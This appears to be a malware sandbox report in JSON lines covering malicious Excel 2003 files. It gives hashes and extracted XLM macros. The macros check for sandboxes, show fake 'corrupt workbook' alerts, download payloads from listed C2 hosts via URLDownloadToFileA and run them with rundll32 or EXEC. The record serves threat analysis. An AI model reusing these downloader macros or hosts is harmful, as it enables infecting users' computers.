{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ecb27cdac752bc83fb2a58790a076815fc9746fad3a151e5c2d2c034e2e7d01"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7ecb27cdac752bc83fb2a58790a076815fc9746fad3a151e5c2d2c034e2e7d01","filesize":185344,"md5":"267859d316145ea23b7189db7ec28166","sha1":"17e258aa2fd05f4795b4f17b59da0539f184c562","sha256":"7ecb27cdac752bc83fb2a58790a076815fc9746fad3a151e5c2d2c034e2e7d01","sha512":"f9d6dc8a5d5e89226093b7002657d26bfdbd2883feee8d64b4df50953ea0cb61d2ba5bda1aff6eff83d370b682d9b98234ac95c156acbc0134589e54079adf8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ecb27cdac752bc83fb2a58790a076815fc9746fad3a151e5c2d2c034e2e7d01.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ed6210b184d5979b666642d3e106cc2098b245feeb438b0eed44d2c5f7cdc1e"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7ed6210b184d5979b666642d3e106cc2098b245feeb438b0eed44d2c5f7cdc1e","filesize":170496,"md5":"5c734e4883f0e2c1cefc98dc019b14ad","sha1":"09b70e7f93bb9bbe5b2e714e7bd850dd9ee50ad5","sha256":"7ed6210b184d5979b666642d3e106cc2098b245feeb438b0eed44d2c5f7cdc1e","sha512":"7dfd46f9027bf488658c8843e5139bfcaa1829a27c69e63a57879e1ac4e80b9b354ddab6a1756cc52b708115d9d24bacacd4882ae577ce0d566d2a91c08116ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ed6210b184d5979b666642d3e106cc2098b245feeb438b0eed44d2c5f7cdc1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xB2p3wK33X\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ef8284c091194fac70e1850484741e35fd2bdce0fc9adbfa36b7d7a1665dda9"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7ef8284c091194fac70e1850484741e35fd2bdce0fc9adbfa36b7d7a1665dda9","filesize":185344,"md5":"d67de2326125d791ee2490177ff40f74","sha1":"ba3f0a06c2472aaf5d7225ae23222a2ede81f38c","sha256":"7ef8284c091194fac70e1850484741e35fd2bdce0fc9adbfa36b7d7a1665dda9","sha512":"8be8746bd99d4975e5f269d6bd95bbfe40853c3eb238f0f5d3fd136f93dffa0df6f74f271312588ad7f648870f21df7816334ee05a1ed1c8c9b68a39639559f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ef8284c091194fac70e1850484741e35fd2bdce0fc9adbfa36b7d7a1665dda9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7f172811c3effcb51903af698ee8c9071f45634fecd94615aa090ce627b4ead3"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7f172811c3effcb51903af698ee8c9071f45634fecd94615aa090ce627b4ead3","filesize":104448,"md5":"2a3a4fa10f4f01694a61ce6a071b91fa","sha1":"e09bb145be234148a6995f6475e3432b091ed92a","sha256":"7f172811c3effcb51903af698ee8c9071f45634fecd94615aa090ce627b4ead3","sha512":"f6564825d1f63ca4e10b298a0e8410ce90791ef4ee601a6ad9d9877ed4cc5b95ea60cf4a62e7eec7f09fd61b87108191d57201c03e30463e676e18d5590e5d70","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7f172811c3effcb51903af698ee8c9071f45634fecd94615aa090ce627b4ead3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"X0hydWivwS\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7f6baa40d69035e10e0bab9d0d0caec42a4a3845282f2c289fc3b7df2e9bccb1"},"analysis":{"reported":"2020-04-09T16:17:18Z","score":10},"files":[{"filename":"7f6baa40d69035e10e0bab9d0d0caec42a4a3845282f2c289fc3b7df2e9bccb1","filesize":167936,"md5":"3ca4423b60820fa855c27f14f4008627","sha1":"ee6157a8767b7d79729f216b908e45c876a607ed","sha256":"7f6baa40d69035e10e0bab9d0d0caec42a4a3845282f2c289fc3b7df2e9bccb1","sha512":"8bc5eaf2a453b1bfd39dde912aa8a81e3b6b8ffc1301befd59da00ead695b24fcb15f169b9b9d2512d19e23b4fe228db9cdd7b0ade509a793f4c2b4c15f73e46","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7f6baa40d69035e10e0bab9d0d0caec42a4a3845282f2c289fc3b7df2e9bccb1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rp7UCsHvF6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7f7f181d513dfe75f8877dd551eb1c66f2912ed14740807c2ccfe09eb8c31412"},"analysis":{"reported":"2020-04-09T16:17:18Z","score":10},"files":[{"filename":"7f7f181d513dfe75f8877dd551eb1c66f2912ed14740807c2ccfe09eb8c31412","filesize":167936,"md5":"3f0dc5524c66dd2559fb82aea383bf46","sha1":"6ea0b106bced4b36dca0960cc3c4403d519b2d20","sha256":"7f7f181d513dfe75f8877dd551eb1c66f2912ed14740807c2ccfe09eb8c31412","sha512":"c626f6c16e8d2220e30be5551e950de3b7ded0614eb3cd6ecb43511409aeff4fd76213c0bfc02e3fb6219067af3503e71a88a0aca4dd0def90aeb341f0c0efc8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7f7f181d513dfe75f8877dd551eb1c66f2912ed14740807c2ccfe09eb8c31412.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sn7aqWsvGK\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7f8472c5a89419008723d175b4292b2c7bab255b170300dbeda9f8bfda1bb051"},"analysis":{"reported":"2020-04-09T16:17:18Z","score":10},"files":[{"filename":"7f8472c5a89419008723d175b4292b2c7bab255b170300dbeda9f8bfda1bb051","filesize":113664,"md5":"7351472d4d90bf9e32e34b71e3ed57d0","sha1":"ceefc654e6ccee759b90720414a34e8ddc542da3","sha256":"7f8472c5a89419008723d175b4292b2c7bab255b170300dbeda9f8bfda1bb051","sha512":"58fcff13b03bbebde47861a795b320d7f7629f8522675399680c211b58c64698faece75f2dd373c678d38ea5c9e0a973dcf59cd793d586077521b11e566f2da4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7f8472c5a89419008723d175b4292b2c7bab255b170300dbeda9f8bfda1bb051.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"GVl5SapjRe\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7f8dbe43f4f995f870a777a037ad24171714bdd01117d7603877368183afa06a"},"analysis":{"reported":"2020-04-09T16:17:18Z","score":10},"files":[{"filename":"7f8dbe43f4f995f870a777a037ad24171714bdd01117d7603877368183afa06a","filesize":167936,"md5":"c914403b0c0a27e8cf766d883041f5fa","sha1":"abfaaa775a37fa2b45bb1fdd9ff7f1337206e191","sha256":"7f8dbe43f4f995f870a777a037ad24171714bdd01117d7603877368183afa06a","sha512":"0c591c7d166dc9c4d4e436579a5a382180522bb9c8781781675eba5ae690e29f315e7378b3a0115bbea06405c574e3cb82373ca84c39fb074d274a4532998769","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7f8dbe43f4f995f870a777a037ad24171714bdd01117d7603877368183afa06a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ytnlgWGuPY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7f9393d56edd5180b8403afbca0210b06437152ee60971b42685ae0f5aa20b3f"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"7f9393d56edd5180b8403afbca0210b06437152ee60971b42685ae0f5aa20b3f","filesize":104448,"md5":"0acf7520534c78df637b15d19c8fc5b2","sha1":"873ff11d2381d828c647624690f9d79c65758b78","sha256":"7f9393d56edd5180b8403afbca0210b06437152ee60971b42685ae0f5aa20b3f","sha512":"3990b92955cc51591169a070e402c2432b24321df51240427495fd8dc46610bc004040308aa9324dc3757f5bfdb78d07ef438cf8ccf56cda7a1fbe4a70f4e89c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7f9393d56edd5180b8403afbca0210b06437152ee60971b42685ae0f5aa20b3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"378cwj8qCg\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7f9aeb82496979bc5b055bc5a7a76183540eb4e5d9367c500985ee63bc6ddab7"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"7f9aeb82496979bc5b055bc5a7a76183540eb4e5d9367c500985ee63bc6ddab7","filesize":185344,"md5":"0f971a2387059b7973c8de2f11e44686","sha1":"ffc676a462c8ddb5a58512b8ca02c25d2bf35105","sha256":"7f9aeb82496979bc5b055bc5a7a76183540eb4e5d9367c500985ee63bc6ddab7","sha512":"51926e6d98df05063967a536b61d978e47bee5c2e534f89602302e1a6e79a5e72ffb5c49eb810406faad8c6f5e2940974ef46a425ed162b32f54afd9e3f65d2d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7f9aeb82496979bc5b055bc5a7a76183540eb4e5d9367c500985ee63bc6ddab7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7fb731bd0651fc1b8a1feccff5893cd2f189c01be8bdc6493ac621f2f5da1bb7"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"7fb731bd0651fc1b8a1feccff5893cd2f189c01be8bdc6493ac621f2f5da1bb7","filesize":225280,"md5":"fdde332967e8c01d5e6a961bf300405a","sha1":"9f7d3ff230caa093851d8a662b086689d66b56b2","sha256":"7fb731bd0651fc1b8a1feccff5893cd2f189c01be8bdc6493ac621f2f5da1bb7","sha512":"cf2ce73bd39ba16c30b4b3685e3237e9e00ab16d3c6983102befebf09f75622b58ae22b4e33b439b62457904d7825b84613840520afe17b5390e9224b91024a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7fb731bd0651fc1b8a1feccff5893cd2f189c01be8bdc6493ac621f2f5da1bb7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WXro3hsdeb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7fb9ba53caa5e68a7501ac01471f961b24e69c9587248f7acbe8c6a69f887988"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"7fb9ba53caa5e68a7501ac01471f961b24e69c9587248f7acbe8c6a69f887988","filesize":116224,"md5":"c1214780cffab887cd123c32c0258ee3","sha1":"d4937eba0948aa5b9c73df21f1565fccd5a0d7b2","sha256":"7fb9ba53caa5e68a7501ac01471f961b24e69c9587248f7acbe8c6a69f887988","sha512":"b0318783373fbf91335d53b24d8bbe5b0d9b84d0d96a5349139966dba954360d280169330fbeffeefc65670a06e9dcea60c0801d2c0c463b0bf9c160e5025c6d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7fb9ba53caa5e68a7501ac01471f961b24e69c9587248f7acbe8c6a69f887988.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QsBEr1Zx12\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ffdec3904f3d81794c857308c909492751962699bc67a364da1c3493e1abb92"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"7ffdec3904f3d81794c857308c909492751962699bc67a364da1c3493e1abb92","filesize":209920,"md5":"39e18036856d6dfd2ce67d5207e9cff9","sha1":"42c25903cea3b32f9c66651271f22ae51a263947","sha256":"7ffdec3904f3d81794c857308c909492751962699bc67a364da1c3493e1abb92","sha512":"cf19f8ef7b801e446fbc6cede3e24eef12c746a166756415f24b5015d87e76cc228ed7ea962dd2eab75a2e9a54797fc9706eec20e53f9ab1c863cc2c191cb46a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ffdec3904f3d81794c857308c909492751962699bc67a364da1c3493e1abb92.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cuW3izBWHh\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80034207afdf2001f9587666e01d7fbc97383d34e72416210191bafe98f00614"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"80034207afdf2001f9587666e01d7fbc97383d34e72416210191bafe98f00614","filesize":168448,"md5":"569b20a25effb90cd4d5cde06b8e2f19","sha1":"139b86e854d81a65dc9210b54abd5f9047fab00b","sha256":"80034207afdf2001f9587666e01d7fbc97383d34e72416210191bafe98f00614","sha512":"9176dcb83ce7873bf8c85d603751ee38e4cf7e15619ed0c9902c8c9e9e155f739f9c4143eb8460382f9f14b9ff583140ef8c664651ccd0c0e6a079e487171b0c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80034207afdf2001f9587666e01d7fbc97383d34e72416210191bafe98f00614.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pxwWx8zPgJ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"80250b3b6ef5e28f684d9a6f52da827c5fe1922a17be5b90a48921b2aa3b95e0"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"80250b3b6ef5e28f684d9a6f52da827c5fe1922a17be5b90a48921b2aa3b95e0","filesize":170496,"md5":"5f569d859be23e2b881ebf87320edde6","sha1":"04bef63442971c54a1194013678e22252c5d5e7f","sha256":"80250b3b6ef5e28f684d9a6f52da827c5fe1922a17be5b90a48921b2aa3b95e0","sha512":"3d5d9a12d1967f01aa02e0be03f425dddcc79228adc48704e3d29e2772145d7b7eca170f07015caf99c525547c8b7403f2b6edc4a93386d854357fffa97991f4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"80250b3b6ef5e28f684d9a6f52da827c5fe1922a17be5b90a48921b2aa3b95e0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nfHzomHeaZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8031e7583f50c49f97977e04190fc2f7aff6e050a144fa235843f7254123801b"},"analysis":{"reported":"2020-04-09T16:17:19Z","score":10},"files":[{"filename":"8031e7583f50c49f97977e04190fc2f7aff6e050a144fa235843f7254123801b","filesize":109568,"md5":"f82fbee1ee9eb9a3760da41762848024","sha1":"ae1616ebbad31c878dfc1f52c61c463eb31406b4","sha256":"8031e7583f50c49f97977e04190fc2f7aff6e050a144fa235843f7254123801b","sha512":"1deef8ccc169e93c752350a7ed8b104d4175b3d7d2b8d26b693aeb00af066324109cc22733961e591944c51b95d6f06e667c2457b2ad9e9dfe2d67b8bec70107","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8031e7583f50c49f97977e04190fc2f7aff6e050a144fa235843f7254123801b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"LKQ387wz4f\",TRUE)\nRETURN()"}}}]}
